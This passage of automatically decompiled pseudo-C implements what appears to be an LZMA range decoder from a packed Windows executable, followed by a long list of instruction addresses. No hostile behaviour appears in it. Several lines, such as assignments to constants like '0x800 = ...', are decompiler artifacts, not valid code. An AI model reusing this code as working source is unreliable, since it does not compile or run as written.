												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406440
0x00406440
0x00406444
0x00406451
0x0040645b
0x00000000
0x00406446
0x00406446
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x0040637a
0x0040637d
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00406740
0x00406744
0x004068f3
0x00406909
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00406925
0x00406750
0x00406757
0x0040675f
0x00406762
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x00000000
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x0040676b
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x00000000
0x00406771
0x0040676b
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
